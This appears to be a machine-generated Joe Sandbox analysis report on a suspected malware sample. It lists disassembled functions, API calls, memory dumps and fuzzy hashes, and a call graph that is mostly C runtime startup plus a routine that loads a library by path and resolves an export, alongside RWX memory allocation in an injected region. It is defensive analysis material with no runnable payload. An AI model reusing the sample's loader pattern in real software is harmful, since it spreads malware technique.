                                                                              Function 00007FFE1A523990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A52112F), ref: 00007FFE1A5239E0
                                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A52112F), ref: 00007FFE1A523A21
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFileHeaderRaise
                                                                              • String ID: csm
                                                                              • API String ID: 2573137834-1018135373
                                                                              • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                              • Instruction ID: 7e6db98a56b2ff1256b49420e600e3f5e89194a7dfe0e439cb67f813646b9d0d
                                                                              • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                              • Instruction Fuzzy Hash: B511193261CF8182EB218F16E44026977E5FB89BA4F5842B2EA8D07B69DF3CD551CB00
                                                                              Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: TimerWaitable
                                                                              • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                              • API String ID: 1823812067-3336177065
                                                                              • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                              • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                              • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                              • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                              Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                              • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                              • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                              • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                              Executed Functions

                                                                              Function 028B017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 028B01DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000027.00000003.2663494058.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_39_3_28b0000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                              • Instruction ID: 9c547cebba8967bfddc960979669499726f58b105331d08275c07baac33d5c2d
                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                              • Instruction Fuzzy Hash: 0FA13D79A00606DFDB16CFA9C884AAEB7B5FF48308F1481ADE419DB351D770EA51CB90
                                                                              Function 028B044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 028B048B
                                                                              • VirtualFree.KERNELBASE(?,?,00004000), ref: 028B04F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000027.00000003.2663494058.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_39_3_28b0000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                              • Instruction ID: 55d91234fe56fc7c55e835b7426056b345e2c2afa41528918294e646185040f9
                                                                              • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                              • Instruction Fuzzy Hash: E821C97DA00605ABD7319EA48C84FEFB7B9AF04318F10856CEA5EE2381D771A9059661

                                                                              Non-executed Functions

                                                                              Function 028B00CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000027.00000003.2663494058.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_39_3_28b0000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l$ntdl
                                                                              • API String ID: 0-924918826
                                                                              • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                              • Instruction ID: 6e95c5c24d3e3271d81d23161102c2b1ab21b00a2efa51d686fb9ef10725118f
                                                                              • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                              • Instruction Fuzzy Hash: D5115EB9701605AFCB16AF18C408A4FBBF6FF88750B21815DE105D7760FB359A228BD6
                                                                              Function 028B0643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000027.00000003.2663494058.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_39_3_28b0000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l$ntdl
                                                                              • API String ID: 0-924918826
                                                                              • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                              • Instruction ID: e1de52c5c6e63a5ad25a95b076d9de30f0e93023c96fddbed454cf7ee3837419
                                                                              • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                              • Instruction Fuzzy Hash: 4501A179B00214AFCB119B98CC409AFFBB9EF88654F00409DF904E7361DA70DE009BA2

                                                                              Execution Graph

                                                                              Execution Coverage:6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:1.3%
                                                                              Total number of Nodes:1047
                                                                              Total number of Limit Nodes:29
                                                                              execution_graph 3962 985138 3963 98514a 3962->3963 3965 985158 @_EH4_CallFilterFunc@8 3962->3965 3964 9810cc ___convertcp 5 API calls 3963->3964 3964->3965 3966 98543d 3967 981411 __amsg_exit 66 API calls 3966->3967 3968 985444 3967->3968 4437 9828fe 4438 982901 4437->4438 4439 9851fb _abort 68 API calls 4438->4439 4440 98290d __ioinit 4439->4440 3969 982d3f 3970 983730 __calloc_crt 66 API calls 3969->3970 3971 982d4b 3970->3971 3972 98207e __encode_pointer 6 API calls 3971->3972 3973 982d53 3972->3973 4000 98235f 4001 98236b __ioinit 4000->4001 4002 98246d __ioinit 4001->4002 4003 9835ee __getptd_noexit 66 API calls 4001->4003 4004 982383 4001->4004 4003->4004 4005 982391 4004->4005 4006 9835ee __getptd_noexit 66 API calls 4004->4006 4007 98239f 4005->4007 4009 9835ee __getptd_noexit 66 API calls 4005->4009 4006->4005 4008 9823ad 4007->4008 4010 9835ee __getptd_noexit 66 API calls 4007->4010 4011 9823bb 4008->4011 4012 9835ee __getptd_noexit 66 API calls 4008->4012 4009->4007 4010->4008 4013 9823c9 4011->4013 4014 9835ee __getptd_noexit 66 API calls 4011->4014 4012->4011 4015 9823d7 4013->4015 4017 9835ee __getptd_noexit 66 API calls 4013->4017 4014->4013 4016 9823e8 4015->4016 4018 9835ee __getptd_noexit 66 API calls 4015->4018 4019 982aa0 __lock 66 API calls 4016->4019 4017->4015 4018->4016 4020 9823f0 4019->4020 4021 9823fc InterlockedDecrement 4020->4021 4022 982415 4020->4022 4021->4022 4023 982407 4021->4023 4036 982479 4022->4036 4023->4022 4027 9835ee __getptd_noexit 66 API calls 4023->4027 4026 982aa0 __lock 66 API calls 4028 982429 4026->4028 4027->4022 4029 98245a 4028->4029 4039 983d2d 4028->4039 4083 982485 4029->4083 4033 9835ee __getptd_noexit 66 API calls 4033->4002 4086 9829c6 LeaveCriticalSection 4036->4086 4038 982422 4038->4026 4040 983d3e InterlockedDecrement 4039->4040 4041 98243e 4039->4041 4042 983d53 InterlockedDecrement 4040->4042 4043 983d56 4040->4043 4041->4029 4053 983b55 4041->4053 4042->4043 4044 983d60 InterlockedDecrement 4043->4044 4045 983d63 4043->4045 4044->4045 4046 983d6d InterlockedDecrement 4045->4046 4047 983d70 4045->4047 4046->4047 4048 983d7a InterlockedDecrement 4047->4048 4049 983d7d 4047->4049 4048->4049 4050 983d96 InterlockedDecrement 4049->4050 4051 983da6 InterlockedDecrement 4049->4051 4052 983db1 InterlockedDecrement 4049->4052 4050->4049 4051->4049 4052->4041 4054 983bd9 4053->4054 4063 983b6c 4053->4063 4055 9835ee __getptd_noexit 66 API calls 4054->4055 4056 983c26 4054->4056 4057 983bfa 4055->4057 4070 983c4d 4056->4070 4111 985ae1 4056->4111 4060 9835ee __getptd_noexit 66 API calls 4057->4060 4059 983ba0 4061 983bc1 4059->4061 4074 9835ee __getptd_noexit 66 API calls 4059->4074 4067 983c0d 4060->4067 4068 9835ee __getptd_noexit 66 API calls 4061->4068 4063->4054 4063->4059 4066 9835ee __getptd_noexit 66 API calls 4063->4066 4064 983c92 4069 9835ee __getptd_noexit 66 API calls 4064->4069 4065 9835ee __getptd_noexit 66 API calls 4065->4070 4071 983b95 4066->4071 4072 9835ee __getptd_noexit 66 API calls 4067->4072 4075 983bce 4068->4075 4076 983c98 4069->4076 4070->4064 4073 9835ee 66 API calls __getptd_noexit 4070->4073 4087 985cbb 4071->4087 4078 983c1b 4072->4078 4073->4070 4079 983bb6 4074->4079 4080 9835ee __getptd_noexit 66 API calls 4075->4080 4076->4029 4081 9835ee __getptd_noexit 66 API calls 4078->4081 4103 985c76 4079->4103 4080->4054 4081->4056 4199 9829c6 LeaveCriticalSection 4083->4199 4085 982467 4085->4033 4086->4038 4088 985cc8 4087->4088 4102 985d45 4087->4102 4089 985cd9 4088->4089 4090 9835ee __getptd_noexit 66 API calls 4088->4090 4091 985ceb 4089->4091 4092 9835ee __getptd_noexit 66 API calls 4089->4092 4090->4089 4093 9835ee __getptd_noexit 66 API calls 4091->4093 4097 985cfd 4091->4097 4092->4091 4093->4097 4094 9835ee __getptd_noexit 66 API calls 4095 985d0f 4094->4095 4096 985d21 4095->4096 4098 9835ee __getptd_noexit 66 API calls 4095->4098 4099 985d33 4096->4099 4100 9835ee __getptd_noexit 66 API calls 4096->4100 4097->4094 4097->4095 4098->4096 4101 9835ee __getptd_noexit 66 API calls 4099->4101 4099->4102 4100->4099 4101->4102 4102->4059 4104 985c83 4103->4104 4110 985cb7 4103->4110 4105 9835ee __getptd_noexit 66 API calls 4104->4105 4106 985c93 4104->4106 4105->4106 4107 985ca5 4106->4107 4108 9835ee __getptd_noexit 66 API calls 4106->4108 4109 9835ee __getptd_noexit 66 API calls 4107->4109 4107->4110 4108->4107 4109->4110 4110->4061 4112 985af2 4111->4112 4113 983c46 4111->4113 4114 9835ee __getptd_noexit 66 API calls 4112->4114 4113->4065 4115 985afa 4114->4115 4116 9835ee __getptd_noexit 66 API calls 4115->4116 4117 985b02 4116->4117 4118 9835ee __getptd_noexit 66 API calls 4117->4118 4119 985b0a 4118->4119 4120 9835ee __getptd_noexit 66 API calls 4119->4120 4121 985b12 4120->4121 4122 9835ee __getptd_noexit 66 API calls 4121->4122 4123 985b1a 4122->4123 4124 9835ee __getptd_noexit 66 API calls 4123->4124 4125 985b22 4124->4125 4126 9835ee __getptd_noexit 66 API calls 4125->4126 4127 985b29 4126->4127 4128 9835ee __getptd_noexit 66 API calls 4127->4128 4129 985b31 4128->4129 4130 9835ee __getptd_noexit 66 API calls 4129->4130 4131 985b39 4130->4131 4132 9835ee __getptd_noexit 66 API calls 4131->4132 4133 985b41 4132->4133 4134 9835ee __getptd_noexit 66 API calls 4133->4134 4135 985b49 4134->4135 4136 9835ee __getptd_noexit 66 API calls 4135->4136 4137 985b51 4136->4137 4138 9835ee __getptd_noexit 66 API calls 4137->4138 4139 985b59 4138->4139 4140 9835ee __getptd_noexit 66 API calls 4139->4140 4141 985b61 4140->4141 4142 9835ee __getptd_noexit 66 API calls 4141->4142 4143 985b69 4142->4143 4144 9835ee __getptd_noexit 66 API calls 4143->4144 4145 985b71 4144->4145 4146 9835ee __getptd_noexit 66 API calls 4145->4146 4147 985b7c 4146->4147 4148 9835ee __getptd_noexit 66 API calls 4147->4148 4149 985b84 4148->4149 4150 9835ee __getptd_noexit 66 API calls 4149->4150 4151 985b8c 4150->4151 4152 9835ee __getptd_noexit 66 API calls 4151->4152 4153 985b94 4152->4153 4154 9835ee __getptd_noexit 66 API calls 4153->4154 4155 985b9c 4154->4155 4156 9835ee __getptd_noexit 66 API calls 4155->4156 4157 985ba4 4156->4157 4158 9835ee __getptd_noexit 66 API calls 4157->4158 4159 985bac 4158->4159 4160 9835ee __getptd_noexit 66 API calls 4159->4160 4161 985bb4 4160->4161 4162 9835ee __getptd_noexit 66 API calls 4161->4162 4163 985bbc 4162->4163 4164 9835ee __getptd_noexit 66 API calls 4163->4164 4165 985bc4 4164->4165 4166 9835ee __getptd_noexit 66 API calls 4165->4166 4167 985bcc 4166->4167 4168 9835ee __getptd_noexit 66 API calls 4167->4168 4169 985bd4 4168->4169 4170 9835ee __getptd_noexit 66 API calls 4169->4170 4171 985bdc 4170->4171 4172 9835ee __getptd_noexit 66 API calls 4171->4172 4173 985be4 4172->4173 4174 9835ee __getptd_noexit 66 API calls 4173->4174 4175 985bec 4174->4175 4176 9835ee __getptd_noexit 66 API calls 4175->4176 4177 985bf4 4176->4177 4178 9835ee __getptd_noexit 66 API calls 4177->4178 4179 985c02 4178->4179 4180 9835ee __getptd_noexit 66 API calls 4179->4180 4181 985c0d 4180->4181 4182 9835ee __getptd_noexit 66 API calls 4181->4182 4183 985c18 4182->4183 4184 9835ee __getptd_noexit 66 API calls 4183->4184 4185 985c23 4184->4185 4186 9835ee __getptd_noexit 66 API calls 4185->4186 4187 985c2e 4186->4187 4188 9835ee __getptd_noexit 66 API calls 4187->4188 4189 985c39 4188->4189 4190 9835ee __getptd_noexit 66 API calls 4189->4190 4191 985c44 4190->4191 4192 9835ee __getptd_noexit 66 API calls 4191->4192 4193 985c4f 4192->4193 4194 9835ee __getptd_noexit 66 API calls 4193->4194 4195 985c5a 4194->4195 4196 9835ee __getptd_noexit 66 API calls 4195->4196 4197 985c65 4196->4197 4198 9835ee __getptd_noexit 66 API calls 4197->4198 4198->4113 4199->4085 3974 9826b0 3975 9826e9 3974->3975 3976 9826dc 3974->3976 3978 9810cc ___convertcp 5 API calls 3975->3978 3977 9810cc ___convertcp 5 API calls 3976->3977 3977->3975 3987 9826f9 __except_handler4 __IsNonwritableInCurrentImage 3978->3987 3979 98277c 3980 982752 __except_handler4 3980->3979 3981 98276c 3980->3981 3982 9810cc ___convertcp 5 API calls 3980->3982 3983 9810cc ___convertcp 5 API calls 3981->3983 3982->3981 3983->3979 3985 9827cb __except_handler4 3986 9827ff 3985->3986 3988 9810cc ___convertcp 5 API calls 3985->3988 3989 9810cc ___convertcp 5 API calls 3986->3989 3987->3979 3987->3980 3990 9851ca RtlUnwind 3987->3990 3988->3986 3989->3980 3990->3985 3892 981391 3893 9813cd 3892->3893 3894 9813a3 3892->3894 3894->3893 3896 9828da 3894->3896 3897 9828e6 __ioinit 3896->3897 3902 982345 3897->3902 3903 9822cc __getptd_noexit 66 API calls 3902->3903 3904 98234d 3903->3904 3905 98235a 3904->3905 3906 981411 __amsg_exit 66 API calls 3904->3906 3907 9851fb 3905->3907 3906->3905 3908 98521a 3907->3908 3909 985221 3907->3909 3910 981719 __NMSG_WRITE 66 API calls 3908->3910 3919 982f92 3909->3919 3910->3909 3914 98530a 3943 981697 3914->3943 3915 985232 ___convertcp 3915->3914 3918 9852ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3915->3918 3918->3914 3920 9820f9 __decode_pointer 6 API calls 3919->3920 3921 982f9d 3920->3921 3921->3915 3922 982f9f 3921->3922 3925 982fab __ioinit 3922->3925 3923 983007 3924 982fe8 3923->3924 3929 983016 3923->3929 3928 9820f9 __decode_pointer 6 API calls 3924->3928 3925->3923 3925->3924 3926 982fd2 3925->3926 3932 982fce 3925->3932 3927 9822cc __getptd_noexit 66 API calls 3926->3927 3930 982fd7 _siglookup 3927->3930 3928->3930 3931 982c72 strtoxl 66 API calls 3929->3931 3934 98307d 3930->3934 3936 981697 _raise 66 API calls 3930->3936 3942 982fe0 __ioinit 3930->3942 3933 98301b 3931->3933 3932->3926 3932->3929 3935 982c0a strtoxl 6 API calls 3933->3935 3937 982aa0 __lock 66 API calls 3934->3937 3938 983088 3934->3938 3935->3942 3936->3934 3937->3938 3939 9820f0 _doexit 6 API calls 3938->3939 3940 9830bd 3938->3940 3939->3940 3946 983113 3940->3946 3942->3915 3944 981555 _doexit 66 API calls 3943->3944 3945 9816a8 3944->3945 3947 983119 3946->3947 3948 983120 3946->3948 3950 9829c6 LeaveCriticalSection 3947->3950 3948->3942 3950->3948 3991 9831b4 3992 9831c0 SetLastError 3991->3992 3993 9831c8 __ioinit 3991->3993 3992->3993 4200 9867c8 RtlUnwind 3951 98458d 3954 9829c6 LeaveCriticalSection 3951->3954 3953 984594 3954->3953 3994 98122e 3997 9818fe 3994->3997 3998 9822cc __getptd_noexit 66 API calls 3997->3998 3999 98123f 3998->3999 3955 981281 3958 98283c 3955->3958 3957 981286 3957->3957 3959 98286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3958->3959 3960 982861 3958->3960 3961 982865 3959->3961 3960->3959 3960->3961 3961->3957 4201 981242 4202 981251 4201->4202 4203 981257 4201->4203 4204 981697 _raise 66 API calls 4202->4204 4207 9816bc 4203->4207 4204->4203 4206 98125c __ioinit 4208 981555 _doexit 66 API calls 4207->4208 4209 9816c7 4208->4209 4209->4206 3204 981104 3241 98264c 3204->3241 3206 981110 GetStartupInfoW 3207 981133 3206->3207 3242 98261b HeapCreate 3207->3242 3210 981183 3244 98248e GetModuleHandleW 3210->3244 3214 981194 __RTC_Initialize 3278 981dde 3214->3278 3215 9810db _fast_error_exit 66 API calls 3215->3214 3217 9811a2 3218 9811ae GetCommandLineW 3217->3218 3352 981411 3217->3352 3293 981d81 GetEnvironmentStringsW 3218->3293 3222 9811bd 3302 981cd3 GetModuleFileNameW 3222->3302 3225 9811d2 3308 981aa4 3225->3308 3226 981411 __amsg_exit 66 API calls 3226->3225 3229 9811e3 3321 9814d0 3229->3321 3231 981411 __amsg_exit 66 API calls 3231->3229 3232 9811ea 3233 981411 __amsg_exit 66 API calls 3232->3233 3234 9811f5 __wwincmdln 3232->3234 3233->3234 3327 981000 CoInitialize CreateMutexW 3234->3327 3236 981216 3237 981224 3236->3237 3341 981681 3236->3341 3359 9816ad 3237->3359 3240 981229 __ioinit 3241->3206 3243 981177 3242->3243 3243->3210 3344 9810db 3243->3344 3245 9824a9 3244->3245 3246 9824a2 3244->3246 3248 982611 3245->3248 3249 9824b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3245->3249 3362 9813e1 3246->3362 3421 9821a8 3248->3421 3251 9824fc TlsAlloc 3249->3251 3253 981189 3251->3253 3255 98254a TlsSetValue 3251->3255 3253->3214 3253->3215 3255->3253 3256 98255b 3255->3256 3366 9816cb 3256->3366 3261 98207e __encode_pointer 6 API calls 3262 98257b 3261->3262 3263 98207e __encode_pointer 6 API calls 3262->3263 3264 98258b 3263->3264 3265 98207e __encode_pointer 6 API calls 3264->3265 3266 98259b 3265->3266 3383 982924 3266->3383 3273 9820f9 __decode_pointer 6 API calls 3274 9825ef 3273->3274 3274->3248 3275 9825f6 3274->3275 3403 9821e5 3275->3403 3277 9825fe GetCurrentThreadId 3277->3253 3748 98264c 3278->3748 3280 981dea GetStartupInfoA 3281 983730 __calloc_crt 66 API calls 3280->3281 3284 981e0b 3281->3284 3282 982029 __ioinit 3282->3217 3283 981f70 3283->3282 3285 981fa6 GetStdHandle 3283->3285 3287 98200b SetHandleCount 3283->3287 3288 981fb8 GetFileType 3283->3288 3291 98317c __ioinit InitializeCriticalSectionAndSpinCount 3283->3291 3284->3282 3284->3283 3286 983730 __calloc_crt 66 API calls 3284->3286 3289 981ef3 3284->3289 3285->3283 3286->3284 3287->3282 3288->3283 3289->3282 3289->3283 3290 981f1c GetFileType 3289->3290 3292 98317c __ioinit InitializeCriticalSectionAndSpinCount 3289->3292 3290->3289 3291->3283 3292->3289 3294 981d92 3293->3294 3295 981d96 3293->3295 3294->3222 3297 9836eb __malloc_crt 66 API calls 3295->3297 3298 981db7 3297->3298 3299 981dbe FreeEnvironmentStringsW 3298->3299 3749 9837f0 3298->3749 3299->3222 3303 981d08 _wparse_cmdline 3302->3303 3304 9811c7 3303->3304 3305 981d45 3303->3305 3304->3225 3304->3226 3306 9836eb __malloc_crt 66 API calls 3305->3306 3307 981d4b _wparse_cmdline 3306->3307 3307->3304 3309 981abc _wcslen 3308->3309 3311 9811d8 3308->3311 3310 983730 __calloc_crt 66 API calls 3309->3310 3312 981ae0 _wcslen 3310->3312 3311->3229 3311->3231 3312->3311 3313 981b45 3312->3313 3315 983730 __calloc_crt 66 API calls 3312->3315 3316 981b6b 3312->3316 3319 981b2a 3312->3319 3753 98367c 3312->3753 3314 9835ee __getptd_noexit 66 API calls 3313->3314 3314->3311 3315->3312 3317 9835ee __getptd_noexit 66 API calls 3316->3317 3317->3311 3319->3312 3320 982ae2 __invoke_watson 10 API calls 3319->3320 3320->3319 3322 9814de __IsNonwritableInCurrentImage 3321->3322 3762 982dc3 3322->3762 3324 9814fc __initterm_e 3326 98151b __IsNonwritableInCurrentImage __initterm 3324->3326 3766 982dac 3324->3766 3326->3232 3328 98101f GetLastError 3327->3328 3329 981035 GetCommandLineW CommandLineToArgvW 3327->3329 3328->3329 3330 98102c 3328->3330 3331 981056 PathFileExistsW 3329->3331 3333 981067 3329->3333 3330->3236 3332 98106e PathFileExistsW 3331->3332 3331->3333 3332->3333 3334 981084 LoadLibraryW 3332->3334 3333->3334 3335 9810aa CloseHandle CoUninitialize 3334->3335 3336 981091 GetProcAddress 3334->3336 3337 9810bb LocalFree 3335->3337 3338 9810c2 3335->3338 3339 9810a1 3336->3339 3340 9810a3 FreeLibrary 3336->3340 3337->3338 3338->3236 3339->3340 3340->3335 3867 981555 3341->3867 3343 981692 3343->3237 3345 9810e9 3344->3345 3346 9810ee 3344->3346 3348 9818c4 __FF_MSGBANNER 66 API calls 3345->3348 3347 981719 __NMSG_WRITE 66 API calls 3346->3347 3349 9810f6 3347->3349 3348->3346 3350 981465 _doexit 3 API calls 3349->3350 3351 981100 3350->3351 3351->3210 3353 9818c4 __FF_MSGBANNER 66 API calls 3352->3353 3354 98141b 3353->3354 3355 981719 __NMSG_WRITE 66 API calls 3354->3355 3356 981423 3355->3356 3357 9820f9 __decode_pointer 6 API calls 3356->3357 3358 9811ad 3357->3358 3358->3218 3360 981555 _doexit 66 API calls 3359->3360 3361 9816b8 3360->3361 3361->3240 3363 9813ec Sleep GetModuleHandleW 3362->3363 3364 98140a 3363->3364 3365 98140e 3363->3365 3364->3363 3364->3365 3365->3245 3432 9820f0 3366->3432 3368 9816d3 __init_pointers __initp_misc_winsig 3435 982913 3368->3435 3371 98207e __encode_pointer 6 API calls 3372 98170f 3371->3372 3373 98207e TlsGetValue 3372->3373 3374 982096 3373->3374 3375 9820b7 GetModuleHandleW 3373->3375 3374->3375 3378 9820a0 TlsGetValue 3374->3378 3376 9820d2 GetProcAddress 3375->3376 3377 9820c7 3375->3377 3381 9820af 3376->3381 3379 9813e1 __crt_waiting_on_module_handle 2 API calls 3377->3379 3382 9820ab 3378->3382 3380 9820cd 3379->3380 3380->3376 3380->3381 3381->3261 3382->3375 3382->3381 3384 98292f 3383->3384 3386 9825a8 3384->3386 3438 98317c 3384->3438 3386->3248 3387 9820f9 TlsGetValue 3386->3387 3388 982111 3387->3388 3389 982132 GetModuleHandleW 3387->3389 3388->3389 3390 98211b TlsGetValue 3388->3390 3391 98214d GetProcAddress 3389->3391 3392 982142 3389->3392 3395 982126 3390->3395 3394 98212a 3391->3394 3393 9813e1 __crt_waiting_on_module_handle 2 API calls 3392->3393 3396 982148 3393->3396 3394->3248 3397 983730 3394->3397 3395->3389 3395->3394 3396->3391 3396->3394 3399 983739 3397->3399 3400 9825d5 3399->3400 3401 983757 Sleep 3399->3401 3443 98557f 3399->3443 3400->3248 3400->3273 3402 98376c 3401->3402 3402->3399 3402->3400 3727 98264c 3403->3727 3405 9821f1 GetModuleHandleW 3406 982207 3405->3406 3407 982201 3405->3407 3408 98221f GetProcAddress GetProcAddress 3406->3408 3409 982243 3406->3409 3410 9813e1 __crt_waiting_on_module_handle 2 API calls 3407->3410 3408->3409 3411 982aa0 __lock 62 API calls 3409->3411 3410->3406 3412 982262 InterlockedIncrement 3411->3412 3728 9822ba 3412->3728 3415 982aa0 __lock 62 API calls 3416 982283 3415->3416 3731 983c9e InterlockedIncrement 3416->3731 3418 9822a1 3743 9822c3 3418->3743 3420 9822ae __ioinit 3420->3277 3422 9821b2 3421->3422 3425 9821be 3421->3425 3423 9820f9 __decode_pointer 6 API calls 3422->3423 3423->3425 3424 9821d2 TlsFree 3429 9821e0 3424->3429 3425->3424 3425->3429 3426 98298b DeleteCriticalSection 3428 9835ee __getptd_noexit 66 API calls 3426->3428 3427 9829a3 3430 9829b5 DeleteCriticalSection 3427->3430 3431 9829c3 3427->3431 3428->3429 3429->3426 3429->3427 3430->3427 3431->3253 3433 98207e __encode_pointer 6 API calls 3432->3433 3434 9820f7 3433->3434 3434->3368 3436 98207e __encode_pointer 6 API calls 3435->3436 3437 981705 3436->3437 3437->3371 3442 98264c 3438->3442 3440 983188 InitializeCriticalSectionAndSpinCount 3441 9831cc __ioinit 3440->3441 3441->3384 3442->3440 3444 98558b __ioinit 3443->3444 3445 9855a3 3444->3445 3455 9855c2 ___convertcp 3444->3455 3456 982c72 3445->3456 3449 985634 HeapAlloc 3449->3455 3452 9855b8 __ioinit 3452->3399 3455->3449 3455->3452 3462 982aa0 3455->3462 3469 984dc3 3455->3469 3475 98567b 3455->3475 3478 9831eb 3455->3478 3481 9822cc GetLastError 3456->3481 3458 982c77 3459 982c0a 3458->3459 3460 9820f9 